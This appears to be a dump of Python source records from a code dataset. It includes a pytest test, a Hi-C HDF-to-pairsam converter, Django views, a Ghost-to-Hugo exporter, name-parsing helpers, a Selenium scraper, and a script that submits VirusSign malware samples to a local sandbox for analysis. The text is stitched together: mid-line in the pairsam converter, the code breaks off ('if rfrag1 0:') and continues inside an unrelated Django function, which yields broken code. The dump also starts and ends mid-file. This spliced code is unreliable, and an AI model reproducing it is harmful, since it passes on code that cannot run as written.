template = '{}'.format(program)\n    with open(os.path.join(dir_name, xml_name), 'wt') as f:\n        f.write(template)\n\n    log.info(\"Step: Verify that QTS process is running and file is consumed\")\n    assert [p.cmdline() for p in psutil.process_iter() if QTS_PROCESS in str(p.cmdline())],\\\n        'Expected process {} is not running'.format(QTS_PROCESS)\n    assert wait(60)(lambda: xml_name not in os.listdir(dir_name))(),\\\n        'File was not consumed within 60 sec'\n\n    log.info(\"Step: Verify Workflow Engine process status\")\n    wfe_processes = requests.get(WFE_URL)\n    assert wfe_processes.status_code == 200,\\\n        'WFE returned error code {}'.format(wfe_processes.status_code)\n    assert 'application/json' in wfe_processes.headers['content-type'],\\\n        'WFE returned unexpected content'\n    assert check_wfe_status(program, 'running'), 'Process {} was not running'.format(program)\n    # If we need warnings about long processing, then it is possible to use chain of check_wfe_status,\n    # but decorator should be changed @wait(60).\n    # if not check_wfe_status(program, 'completed'):\n    #     log.warn('Process {} was not finished within 60 sec'.format(program))\n    # if not check_wfe_status(program, 'completed'):\n    #     log.warn('Process {} was not finished even in 120 sec'.format(program))\n    assert check_wfe_status(program, 'completed'),\\\n        'Process {} was not finished within 180 sec'.format(program)\n\n    log.info(\"Step: Verify that {} is in DB\".format(program))\n    assert requests.get(MM_URL.format(program)).status_code == 200,\\\n        '{} is absent in DB according to MediaManager API'.format(program)\n\n\nif __name__ == '__main__':\n    pytest.main(['-s', '-v'])\n","sub_path":"async_system/qts_test.py","file_name":"qts_test.py","file_ext":"py","file_size_in_byte":3842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"128050868","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom collections import OrderedDict\nimport subprocess\nimport fileinput\nimport itertools\nimport click\nimport pipes\nimport sys\nimport os\nimport io\nimport copy\nimport h5py\nimport pickle\n\nfrom . import _fileio, _pairsam_format, _headerops, cli, common_io_options\nfrom .pairsam_stats import PairCounter\n\n\nUTIL_NAME = 'pairsam_hdf2pairsam'\n\nEXTRA_COLUMNS = [\n    'mapq',\n    'pos5',\n    'pos3',\n    'cigar',\n    'read_len',\n    'matched_bp',\n    'algn_ref_span',\n    'algn_read_span',\n    'dist_to_5',\n    'dist_to_3',\n    'rfrag',\n    'rfrag_dist',\n    'rfrag_dist_up',\n    'rfrag_dist_down'\n]\n\n@cli.command()\n@click.argument(\n    'hdf_path',\n    type=str,\n    required=False)\n@click.option(\n    \"-o\", \"--output\", \n    type=str, \n    default=\"\", \n    help='output file. '\n        ' If the path ends with .gz or .lz4, the output is pbgzip-/lz4-compressed.'\n         'By default, the output is printed into stdout. ')\n@click.option(\n    \"-f\", \"--frags\",\n    type=str,\n    required=False,\n    help='a tab-separated BED file with the positions of restriction fragments '\n         '(chrom, start, end). Can be generated using cooler digest.')\n\n@common_io_options\n\ndef hdf2pairsam(hdf_path, output, **kwargs):\n    '''parse .hdf5 and make .pairsam.\n\n    SAM_PATH : input .sam file. If the path ends with .bam, the input is \n    decompressed from bam. By default, the input is read from stdin.\n    '''\n    parse_hdf(hdf_path, output, **kwargs)\n\n\ndef parse_hdf(hdf_path, output, **kwargs):\n\n\n    infile = h5py.File(hdf_path)\n\n    outstream = (_fileio.auto_open(output, mode='w',\n                                   nproc=kwargs.get('nproc_out'),\n                                   command=kwargs.get('cmd_out', None)) \n                 if output else sys.stdout)\n\n    write_pairsam(infile, outstream, **kwargs)\n\n    if outstream != sys.stdout:\n        outstream.close()\n\ndef write_pairsam(infile, out_file, **kwargs):\n\n    infile_d = {\"chrms1\": infile['chrms1'].value,\n                \"chrms2\": infile['chrms2'].value,\n                \"pos1\": infile['cuts1'].value,\n                \"pos2\": infile['cuts2'].value,\n                \"strand1\": infile['strands1'].value,\n                \"strand2\": infile['strands2'].value,\n                }\n\n    idx2label = pickle.loads(infile['misc'].value)['genome']['idx2label']\n\n    #reading rfrags\n    if len(kwargs['frags'])>0:\n        frags = kwargs['frags']\n\n        import numpy as np\n        from numpy.lib.recfunctions import append_fields  # for rfrags indexing\n\n        rfrags = np.genfromtxt(\n            frags, delimiter='\\t', comments='#', dtype=None,\n            names=['chrom', 'start', 'end', 'idx'])\n\n        rfrags.sort(order=['chrom', 'start', 'end'])\n\n        rfrags = append_fields(rfrags, 'idx', np.arange(len(rfrags)))\n        rfrags['end'] += 1\n\n        chrom_borders = np.r_[0,\n                              1 + np.where(rfrags['chrom'][:-1] != rfrags['chrom'][1:])[0],\n                              rfrags.shape[0]]\n        rfrags = {rfrags['chrom'][i]: rfrags[['end', 'idx']][i:j]\n                  for i, j in zip(chrom_borders[:-1], chrom_borders[1:])}\n\n        print('Rfrags read')\n\n\n    out_file.write(\"#columns: readID chrom1 pos1 chrom2 pos2 strand1 strand2 pair_type rfrag1 rfrag2\")\n    out_file.write(\"\\n\")\n\n    for i in range(len(infile_d[\"chrms1\"])):\n\n        if (infile_d['chrms1'][i]<0) or (infile_d['chrms2'][i]<0):\n            continue\n\n        chr1 = \"chr\"+idx2label[infile_d['chrms1'][i]]\n        chr2 = \"chr\"+idx2label[infile_d['chrms2'][i]]\n\n        rfrag1, _, _ = \\\n            find_rfrag(rfrags, chr1, infile_d['pos1'][i] + (10 if infile_d['strand1'][i] else -10))\n        rfrag2, _, _ = \\\n            find_rfrag(rfrags, chr2, infile_d['pos2'][i] + (10 if infile_d['strand2'][i] else -10))\n\n        if rfrag1 0:\r\n                next_q_instance = next_q.first()\r\n                return redirect(\"questions:single\", qid=next_q_instance.id)\r\n            else:\r\n                messages.add_message(request, messages.INFO,\r\n                    \"You've answered all of the questions. (For now!)\")\r\n                return redirect(\"home\")\r\n\r\n        context = {\r\n            \"form\": form,\r\n            \"instance\": instance,\r\n        }\r\n        return render(request, \"questions/single.html\", context)\r\n    else:\r\n        raise Http404\r\n\r\n\r\ndef interest_single(request, slug):\r\n\r\n    if request.user.is_authenticated:\r\n        interest = Interest.objects.all().order_by('timestamp')\r\n        instance = get_object_or_404(Interest, slug=slug)\r\n        try:\r\n            user_answer = AnswerInterest.objects.get(user=request.user, interest=instance)\r\n            updated_q = True\r\n        except AnswerInterest.DoesNotExist:\r\n            user_answer = AnswerInterest()\r\n            updated_q = False\r\n        except AnswerInterest.MultipleObjectsReturned:\r\n            user_answer = AnswerInterest.objects.filter(user=request.user, interest=instance)[0]\r\n            updated_q = True\r\n        except:\r\n            user_answer = AnswerInterest()\r\n            updated_q = False\r\n\r\n        form = AnswerInterestForm(request.POST or None)\r\n        if (form.is_valid() and request.user.is_authenticated):\r\n            user_answer.user = request.user\r\n            user_answer.interest = Interest.objects.filter(slug=slug).first()\r\n            user_answer.response = form.cleaned_data.get('response')\r\n            user_answer.timestamp = datetime.datetime.now()\r\n            user_answer.save()\r\n\r\n            next_q = Interest.objects.get_unanswered(user=request.user).order_by(\"?\")\r\n            if next_q.count() > 0:\r\n                next_q_instance = next_q.first()\r\n                return redirect(\"questions:interest_single\", slug=next_q_instance.slug)\r\n            else:\r\n                messages.add_message(request, messages.INFO,\r\n                    \"You've answered all of the interest questions. (For now!)\")\r\n                return redirect(\"home\")\r\n\r\n        context = {\r\n            \"form\": form,\r\n            \"instance\": instance,\r\n        }\r\n        return render(request, \"questions/single_interest.html\", context)\r\n    else:\r\n        raise Http404\r\n","sub_path":"neurosphere/questions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"163491344","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport sqlite3\nimport json\nfrom datetime import datetime\n\n\n# optional usage to remove accents on tag names\n# -------------\nimport unicodedata\ndef remove_accents(input_str):\n    nkfd_form = unicodedata.normalize('NFKD', unicode(input_str))\n    return u\"\".join([c for c in nkfd_form if not unicodedata.combining(c)])\n# -------------\n\nconn = sqlite3.connect('ghost-dev.db')\nconn.row_factory = sqlite3.Row\n\nc = conn.cursor()\nc2 = conn.cursor()\n\nl = []\n\nfor i in c.execute('''\nSELECT id, title, meta_description as description, slug, markdown as text,\nstatus as draft, page, meta_title, image,\nDATE(published_at/1000, \"unixepoch\") as date,\nDATE(created_at/1000, \"unixepoch\") as date2\nFROM posts'''):\n    g = {i.keys()[e]: tuple(i)[e] for e in range(len(i.keys()))}\n    t = (i['id'],)\n    g['tags'] = [e['name'] for e in c2.execute('''\n    SELECT t.name FROM posts_tags pt JOIN tags t ON pt.tag_id = t.id\n    WHERE pt.post_id=?''', t)]\n\n    if g['date'] == None:\n        g['date'] = g['date2']\n    if g['draft'] == 'published':\n        g['draft'] = False\n    else:\n        g['draft'] = True\n    g.pop('date2')\n\n    # post description\n    if g['description'] == None:\n        g['description'] = \"\"\n\n    # post content    \n    text = g.pop('text')\n    text = text.replace(\"# \", \"#\")\n    text = text.replace(\"#\", \"# \")\n    text = text.replace(\"# # # \", \"### \")\n    text = text.replace(\"# # \", \"## \")\n    text = text.replace(\"\\# \", \"\\#\")\n\n    # post type\n    if g['page'] == True:\n        page = 'page'\n    else:\n        page = 'post'\n    g['type'] = page\n    g.pop('page')    \n\n    with open('./content/%s.md' % (g['slug']), 'w') as post_file:\n        post_file.write('+++\\n')\n        post_file.write('type = \"%s\"\\n' % g['type'])\n        post_file.write('date = \"%s\"\\n' % g['date'])\n        post_file.write('title = \"%s\"\\n' % g['title'].encode('utf8'))\n        post_file.write('description = \"%s\"\\n' % g['description'].encode('utf8'))\n        post_file.write('slug = \"%s\"\\n' % g['slug'])\n        \n        post_file.write('tags = [')\n\n        # encode each tag to accept accents or removed them\n        # and add a comma to separate each one\n        for i in xrange(0, len(g['tags'])):\n            if i < len(g['tags']) - 1 :\n                separator = \", \"\n            else:\n                separator = \"\"\n            \n            # encode string to keep accents etc. E.g. \"Introdução e Avaliações\"\n            tag = g['tags'][i].encode('utf8')\n\n            # uncomment if you like to remove accents. E.g. \"Introducao e Avaliacoes\"\n            tag = remove_accents(g['tags'][i])\n\n            post_file.write('\"%s\"' % tag+separator)\n\n        post_file.write(']\\n')\n\n        post_file.write('+++\\n\\n')\n        post_file.write(text.encode('utf8'))\n","sub_path":"ghost2hugo.py","file_name":"ghost2hugo.py","file_ext":"py","file_size_in_byte":2785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"619351727","text":"import requests\nimport json\n\nf = open('data.txt', 'r')\nline = f.readline()\nresultLines = []\nwhile line:\n    result = line.split(\",\")[4] + line.split(\",\")[5] + line.split(\",\")[6]\n    r = requests.get(url=\"http://search.maps.sputnik.ru/search?q=\"+result)\n    y = json.loads(r.text)\n    lat = (y[\"result\"][0][\"position\"][\"lat\"])\n    lon = (y[\"result\"][0][\"position\"][\"lon\"])\n    line = line.replace(\"NULL\", str(lat), 1)\n    line = line.replace(\"NULL\", str(lon), 1)\n    resultLines.append(line)\n    line = f.readline()\nf.close()\nf = open('data.txt', 'w')\nf.writelines(resultLines)\nf.close()\n","sub_path":"task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"471535163","text":"wdir = '/home/valencianaplop/vietherb/data/'\n#wdir = '/home/ltly.student/Tri/vietherb/data/'\nfile1 = 'master_record.tsv'\n\nimport os\nimport string\n\ndef refine(str1):\n\tstr1 = str1.split()\n\tfor i in range(1,len(str1)):\n\t\tbase = False\n\t\tfor char in str1[i]:\n\t\t\tif char in string.ascii_uppercase:\n\t\t\t\tstr1 = str1[:i]\n\t\t\t\tbase  = True\n\t\t\t\tbreak\n\t\tif base == True:\n\t\t\tbreak\n\n\tstr1 =  ' '.join(str1)\n\tstr1 = str1.replace('.','').replace('-','')\n\treturn str1\n\t\t\t\n\ndef main():\n\tos.chdir(wdir)\n\tread = open(file1)\n\tsave = open('master_record.tsv.tmp','w')\n\tsave.write(next(read))\n\tfor line in read:\n\t\tcol = line.split('\\t')\n\t\tcol[3] = refine(col[3])\n\t\tline = '\\t'.join(col)\n\t\tsave.write(line+'\\n')\n\tos.system('mv '+file1+'.tmp '+file1)\n\t\nmain()\t\n","sub_path":"bin/refine_2.py","file_name":"refine_2.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"538196790","text":"#-*-coding:utf-8-*-\nimport requests, os, subprocess\n\nimport time, sys, pickle\nimport multiprocessing as mp\n\nREST_URL = \"http://localhost:8090/tasks/create/file\"\n#DIRECTORY = \"/home/seclab/virussign_20170727\"\n\ndef explorer( root ):\n    ret = []\n    file_list = []\n\n    save_root_path = \"/home/seclab/Desktop/report\"\n    save_dir_path = \"\"\n    before_save_dir_name = \"\"\n\n    for p, dir, files in os.walk(root) :\n\n        save_dir_name_check = p.split(os.sep)[-1]\n\n\n        if \"virussign\" in save_dir_name_check:\n            if not os.path.exists(os.path.join(save_root_path, save_dir_name_check.split(\"_\")[1])):\n                save_dir_name = save_dir_name_check.split(\"_\")[1]\n                save_dir_path = os.path.join(save_root_path, save_dir_name)\n                os.mkdir(save_dir_path)\n\n                before_save_dir_name = save_dir_name\n\n        if len(file_list) > 0 and before_save_dir_name != save_dir_name:\n            with open(os.path.join(save_root_path, before_save_dir_name, \"classify.csy\"), \"wb\") as f:\n                pickle.dump(file_list, f)\n            file_list.clear()\n\n\n\n        # if root_dir[1] != '':\n        #     tmp = os.path.join(root_path, p.split(root.split(os.sep)[-1])[1][1:])\n        # else :\n        #     tmp = root_path\n        # if len(dir) != 0 :\n        #     for dir_name in dir :\n        #         try :\n        #             os.mkdir(os.path.join(tmp, dir_name))\n        #         except :\n        #             pass\n        if not dir:\n            dir_name = p.split(os.sep)[-1]\n\n            if dir_name == \"dll32\" or dir_name == \"exe32\":\n                for file in files:\n                    ret.append(os.path.join(p, file))\n                    file_list.append(file)\n\n            if dir_name == \"dll64\" or dir_name == \"exe64\":\n                for file in files:\n                    file_list.append(file)\n\n    return ret\n\n\ndef get_file_name ( file_path ) :\n    return os.path.basename(file_path)\n\n\ndef send_file(file_path):\n    with open(file_path, 'rb') as f:\n        file_name = get_file_name(file_path)\n        fs = {'file' : (file_name, f)}\n        r = requests.post(REST_URL, files=fs)\n        if r.status_code == 200:\n            print(\"{} is succeeded\".format(file_name))\n        else :\n            print(\"{} is failed\".format(file_name))\n\n\ndef run(root, process_count=os.cpu_count()):\n    file_path_list = explorer(root)\n    mp.freeze_support()\n    p = mp.Pool(process_count)\n    p.map(send_file, file_path_list)\n\n\nif __name__ == '__main__':\n    if len(sys.argv) == 2:\n        start = time.time()\n        run(sys.argv[1])\n        print(\"Time : {}\".format(time.time() - start))\n    elif len(sys.argv) == 3:\n        start = time.time()\n        run(sys.argv[1], int(sys.argv[2]))\n        print(\"Time : {}\".format(time.time() - start))\n\n\n","sub_path":"script/upload_virussign.py","file_name":"upload_virussign.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"391097444","text":"\"\"\"Various routines that deal with names\"\"\"\ndef formatfullname(name):\n    \"\"\"Returns a string of the name, including all fields that are present\"\"\"\n    res=\"\"\n    full=name.get(\"full\", \"\")\n    fml=\"\"\n    f=name.get(\"first\", \"\")\n    m=name.get(\"middle\", \"\")\n    l=name.get(\"last\", \"\")\n    if len(f) or len(m) or len(l):\n        fml+=f\n        if len(m) and len(fml) and fml[-1]!=' ':\n            fml+=\" \"\n        fml+=m\n        if len(l) and len(fml) and fml[-1]!=' ':\n            fml+=\" \"\n        fml+=l\n    if len(fml) or len(full):\n        if fml==full:\n            res+=full\n        else:\n            if len(full):\n                res+=full\n            if len(fml):\n                if len(res):\n                    res+=\" | \"\n                res+=fml\n    if name.has_key(\"nickname\"):\n        res+=\" (\"+name[\"nickname\"]+\")\"\n    return res\ndef formatsimplename(name):\n    \"like L{formatname}, except we use the first matching component\"\n    if len(name.get(\"full\", \"\")):\n        return name.get(\"full\")\n    f=name.get(\"first\", \"\")\n    m=name.get(\"middle\", \"\")\n    l=name.get(\"last\", \"\")\n    if len(f) or len(m) or len(l):\n        return \" \".join([p for p in (f,m,l) if len(p)])\n    return name.get('nickname', \"\")\ndef formatsimplelastfirst(name):\n    \"Returns the name formatted as Last, First Middle\"\n    f,m,l=getparts(name)\n    if len(l):\n        if len(f+m):\n            return l+\", \"+\" \".join([f,m])\n        return l\n    return \" \".join([f,m])\ndef getfullname(name):\n    \"\"\"Gets the full name, joining the first/middle/last if necessary\"\"\"\n    if name.has_key(\"full\"):\n        return name[\"full\"]\n    parts=[name.get(part, \"\") for part in (\"first\", \"middle\", \"last\")]\n    return \" \".join([part for part in parts if len(part)])\nlastparts= [ \"van\", \"von\", \"de\", \"di\" ]\ndef getparts(name):\n    \"\"\"Returns (first, middle, last) for name.  If the part doesn't exist\n    then a blank string is returned\"\"\"\n    for i in (\"first\", \"middle\", \"last\"):\n        if name.has_key(i):\n            return (name.get(\"first\", \"\"), name.get(\"middle\", \"\"), name.get(\"last\", \"\"))\n    if not name.has_key(\"full\"):\n        return (name.get(\"nickname\", \"\"), \"\", \"\")\n    n=name.get(\"full\")\n    parts=n.split()\n    if len(parts)<=1:\n        return (n, \"\", \"\")\n    if len(parts)==2:\n        return (parts[0], \"\", parts[1])\n    f=[parts[0]]\n    m=[]\n    l=[parts[-1]]\n    del parts[0]\n    del parts[-1]\n    while len(parts) and (parts[-1][0].lower()==parts[-1][0] or parts[-1].lower() in lastparts):\n        l=[parts[-1]]+l\n        del parts[-1]\n    m=parts\n    return (\" \".join(f), \" \".join(m), \" \".join(l))\ndef getfirst(name):\n    return getparts(name)[0]\ndef getmiddle(name):\n    return getparts(name)[1]\ndef getlast(name):\n    return getparts(name)[2]\n","sub_path":"BitPim/rev3177-3296/base-trunk-3177/nameparser.py","file_name":"nameparser.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"209484433","text":"chrome_driver_path = \"C:/Yogesh/Softwares/chromedriver_win32/chromedriver.exe\"\nfrom selenium import webdriver\ndriver = webdriver.Chrome(executable_path=chrome_driver_path)\n\ndriver.get(\"https://www.amazon.in/dp/B07X8V5YKR/ref=pc_mcnc_merchandised-search-11_?pf_rd_s=merchandised-search-11&pf_rd_t=Gateway&pf_rd_i=mobile&pf_rd_m=A1VBAL9TL5WCBF&pf_rd_r=TQEZZ2RGHSW33KFQGDSJ&pf_rd_p=4c0716f1-441a-47ee-ad12-281cdb914f9a\")\nprice = driver.find_element_by_id(\"priceblock_dealprice\")\n# price = driver.find_element_by_id(\"\")\nprint(price.text)\npriceX = driver.find_element_by_xpath('//*[@id=\"priceblock_dealprice\"]')\nprint(priceX.text)\n# driver.close()\ndriver.quit()","sub_path":"Day48-Selenium/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"200157418","text":"from teem import OperationPayload\n\n\nclass Server():\n    \"\"\"Receives operations from clients, transforms, and replies to clients.\"\"\"\n\n    def __init__(self, document, storage):\n        self.document = document\n        self.storage = storage\n\n    def receive_operation(self, operation_payload):\n        \"\"\"\n        Handles an incoming operation from a client.\n\n        Receives the operation, transforms it against all subsequent\n        operations, applies it to the current document, and returns the\n        operation to send to all clients.\n        \"\"\"\n        parent = operation_payload.parent\n        operation = operation_payload.operation\n        subsequent_operations = self.storage.get_subsequent(operation_payload)\n        for subsequent_operation in subsequent_operations:\n            operation, _ = operation.transform(subsequent_operation.operation)\n            parent = subsequent_operation.parent\n        self.document = operation.apply(self.document)\n        operation_payload = OperationPayload(\n            parent,\n            operation_payload.uuid,\n            operation,\n        )\n        self.backend.save_operation(operation_payload)\n        return operation_payload\n","sub_path":"teem/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"368968066","text":"from TaxonDictionary import TaxonDictionary\n\nclass TaxonPackage(TaxonDictionary):\n\t\"\"\" Пакет. Контейнер для группы модулей и других пакетов.\n\tДля Wpp-сообщества (и большинства других) это директория.\n\tНо для JS может осуществляться объединение пакетов и модулей в один файл.\n\t\"\"\"\n\ttype = 'Package'\n\n\tdef export(self, outContext):\n\t\tnewContext = outContext.createFolder(self.name)\n\t\tself.onNewFolder(newContext)\n\t\tfor item in self.items:\n\t\t\titem.export(newContext)\n\n\tdef onNewFolder(self, outContext):\n\t\tpass\n\n\tdef findUp(self, name, fromWho, source):\n\t\t\"\"\" Поиск внутри пакета предполагает, что надо искать во вложенных пакетах и модулях\n\t\t\"\"\"\n\t\tif self.name == name:\n\t\t\treturn self\n\t\tresults = []\n\t\tfor i in self.items:\n\t\t\tif i != fromWho:\n\t\t\t\t# Имя модуля не участвует в поиске. Т.к. часто имя класса совпадает с именем модуля. И нужно находить класс, а не модуль\n\t\t\t\tif i.name == name and i.type != 'Module':\n\t\t\t\t\treturn i\n\t\t\t\tresults += i.findDown(name)\n\t\tif len(results) == 1:\n\t\t\treturn results[0]\n\t\t# Вполне возможно, что в разных пакетах будут таксоны с одинаковыми именами\n\t\t# В этом случае нужно сгенерировать ошибку. Т.к. для точного указания нужно имя пакета\n\t\tif len(results) > 1:\n\t\t\tmsg = 'Multiply declaration of \"'+name+'\" in ['\n\t\t\tmsg += ', '.join([res.getPath() for res in results]) + ']'\n\t\t\tsource.throwError(msg)\n\t\tif self.owner:\n\t\t\treturn self.owner.findUp(name, self, source)\n\n\tdef findDown(self, name):\n\t\t\"\"\" Поиск вниз для пакета предполагает обход всех подчиненных\n\t\tПотому что это подчиненные пакеты или модули\n\t\t\"\"\"\n\t\tresults = []\n\t\tif self.name == name:\t# Пакеты участвуют в поиске по имени, в отличие от модулей\n\t\t\tresults.append(self)\n\t\tfor i in self.items:\n\t\t\tresults += i.findDown(name)\n\t\treturn results\n","sub_path":"src/core/TaxonPackage.py","file_name":"TaxonPackage.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"51330724","text":"'''\n\n  Created by irving on 8/10/18\n\n'''\nimport pickle\nimport cv2\nfrom modules.sample import Sample\nfrom modules.loader import Loader\nfrom modules.settings import ProjectSettings\nimport random\n\nwith open('body_face_sample.pickle', 'rb') as f:\n    body_face_samples: {str: Sample} = pickle.load(f)\nwith open('car_sample.pickle', 'rb') as f:\n    car_samples: {str: Sample} = pickle.load(f)\n\ncustom_samples = body_face_samples.copy()\ncustom_samples.update(car_samples)\n\nkeys = list(custom_samples.keys())\nrandom.shuffle(keys)\ncustom_samples = {key: custom_samples[key] for key in keys}\n\nsettings = ProjectSettings(\"settings.yaml\")\n\n# Load the label mapping.\nloader = Loader()\nloader.load_labels(settings.LABELS_FILE)\n\nbody_face_labels = ['/m/04yx4', '/m/03bt1vf', '/m/01g317', '/m/05r655', '/m/01bl7v',\n                    '/m/0dzct', '/m/04hgtk']\n\ncar_labels = ['/m/01prls']\n\nfor key, value in custom_samples.items():\n    labelled_image = value.get_visualized_image_custom_label(label_map_function=loader.get_label,\n                                                             custom_label=car_labels + body_face_labels)\n    cv2.imwrite(ProjectSettings.instance().CUSTOM_LABELLED_DIRECTORY +\n                key + '.jpg', labelled_image)\n    cv2.imshow('Vis', labelled_image)\n    cv2.waitKey(0)\n","sub_path":"custom_visualization.py","file_name":"custom_visualization.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"606914197","text":"from app import app\nfrom app.models import User\nfrom flask_script import Manager\n\nmanage = Manager(app)\n\n@manage.command\ndef save():\n    todo = User(username='study flask')\n    todo.save()\n\n\n\nif __name__ =='__main__':\n    manage.run()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"466144497","text":"# Lint as: python3\n# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nr\"\"\"Runs shot classification on video files.\n\nCan output to either a video file or to the UI (default).\n\nRequires cv2 from `sudo apt-get install python3-opencv`\n\npython3 examples/video_file_demo.py \\\n  --input_video data/shot_classification.mp4\n  --input_video data/shot_classification_annotated.mp4\n  --model data/shot_classification_model.pb \\\n  --label data/shot_classification_label_map.pbtxt\n\nTo output to UI instead of file, do not include the \"--output_video\" argument.\n\npython3 examples/video_file_demo.py \\\n  --input_video data/shot_classification.mp4\n  --model data/shot_classification_model.pb \\\n  --label data/shot_classification_label_map.pbtxt\n\nPress Q key to exit.\n\"\"\"\nimport argparse\nfrom automl_video_ondevice import shot_classification as vcn\nimport utils\n\ntry:\n  import cv2  # pylint: disable=g-import-not-at-top\nexcept:  # pylint: disable=bare-except\n  print(\"Couldn't load cv2. Try running: sudo apt install python3-opencv.\")\n\n\ndef main():\n  default_video = 'data/shot_classification.mp4'\n  default_model = 'data/shot_classification_model.pb'\n  default_labels = 'data/shot_classification_label_map.pbtxt'\n  parser = argparse.ArgumentParser()\n  parser.add_argument('--model', help='model path', default=default_model)\n  parser.add_argument(\n      '--labels', help='label file path', default=default_labels)\n  parser.add_argument(\n      '--input_video', help='input video file path', default=default_video)\n  parser.add_argument(\n      '--output_video', help='output video file path', default='')\n  parser.add_argument(\n      '--threshold', type=float, default=0.2, help='class score threshold')\n  parser.add_argument(\n      '--use_tracker', type=bool, default=False, help='use an object tracker')\n  parser.add_argument(\n      '--top_k',\n      type=int,\n      default=1,\n      help='The number of results to return, ordered by highest to lowest score.'\n  )\n  args = parser.parse_args()\n\n  print('Loading %s with %s labels.' % (args.model, args.labels))\n\n  config = vcn.ShotClassificationConfig(\n      score_threshold=args.threshold, top_k=args.top_k)\n  engine = vcn.load(args.model, args.labels, config)\n  input_size = engine.input_size()\n\n  cap = cv2.VideoCapture(args.input_video)\n\n  writer = None\n  if cap.isOpened() and args.output_video:\n    writer = cv2.VideoWriter(args.output_video, cv2.VideoWriter_fourcc(*'mp4v'),\n                             cap.get(cv2.CAP_PROP_FPS),\n                             (int(cap.get(cv2.CAP_PROP_FRAME_WIDTH)),\n                              int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))))\n\n  timestamp = 0\n  while cap.isOpened():\n    ret, frame = cap.read()\n\n    if not ret:\n      break\n\n    # Resizes frame.\n    resized_frame = cv2.resize(frame, (input_size.width, input_size.height))\n    rgb_frame = cv2.cvtColor(resized_frame, cv2.COLOR_BGR2RGB)\n\n    # Calculates current microsecond for timestamp.\n    timestamp = int(timestamp + (1/cap.get(cv2.CAP_PROP_FPS)) * 1000 * 1000)\n\n    # Run inference engine to populate annotations array.\n    annotations = []\n    if engine.run(timestamp, rgb_frame, annotations):\n      frame = utils.render_classifications(frame, annotations)\n\n    if writer:\n      writer.write(frame)\n    else:\n      cv2.imshow('frame', frame)\n      if cv2.waitKey(1) & 0xFF == ord('q'):\n        break\n\n  if writer:\n    writer.release()\n  else:\n    cv2.destroyAllWindows()\n  cap.release()\n\n\nif __name__ == '__main__':\n  main()\n","sub_path":"examples/video_classification_file_demo.py","file_name":"video_classification_file_demo.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"467122473","text":"from lib import *\nimport hw6\nfrom hw6 import *\n\n\nclass Div2(Pretty):\n\n    def __init__(i, lst, x=0, y=6, yis=\"Num\"):\n        i.yis = yis\n        i.x_lst, i.y_lst = i.getObjects(sorted(lst, key=lambda xyz: xyz[y]), yis, x, y)\n        i.b4 = i.y_lst\n        # print(i.x_lst.sd,i.y_lst.mode)\n        i._lst = i.y_lst.numList if i.yis == \"Num\" else i.y_lst.symList\n        i.gain = 0\n        i.step = int(i.y_lst.count ** THE.div.min)\n        i.stop = last(i._lst)\n        i.start = first(i._lst)\n        i.ranges = []\n        i.xranges = []\n        i.epsilon = i.b4.sd * THE.div.cohen\n        # print(i.epsilon)\n        i.rank, i.cut, i.best = i.__divide(1, i.y_lst.count, i.b4, 1)\n        i.gain /= len(i._lst)\n\n    def getObjects(i, data, yis, x, y):\n        x_lst = hw6.Num()\n        if yis == \"Num\":\n            y_lst = hw6.Num()\n        else:\n            y_lst = hw6.Sym()\n        for i in data:\n            x_lst.num2(i[x])\n            if yis == \"Num\":\n                y_lst.num2(i[y])  # change\n            else:\n                y_lst.Sym2(i[y])\n        return x_lst, y_lst\n\n    def xis(i, lst):\n        num = hw6.Num()\n        for i in lst:\n            num.num2(i)\n        return num\n\n    def yis1(i, lst, key):\n        sym = hw6.Sym()\n        for row in lst:\n            sym.Sym2(row[key])\n        return sym\n\n    def symSplit(i, lst):\n        sym = hw6.Sym()\n        for i in lst:\n            sym.Sym2(i)\n        return sym\n\n    def xSplit(i):\n        start = 0\n        for j in i.ranges:\n            i.xranges.append(i.xis(i.x_lst.numList[start:start + j.count]))\n            start += j.count\n        return 1, len(i.ranges)\n\n    def printSplits(i):\n        if i.yis == \"Num\":\n            print(\"\\nPart 1:\")\n            for k in range(len(i.ranges)):\n                x = i.xranges[k]\n                y = 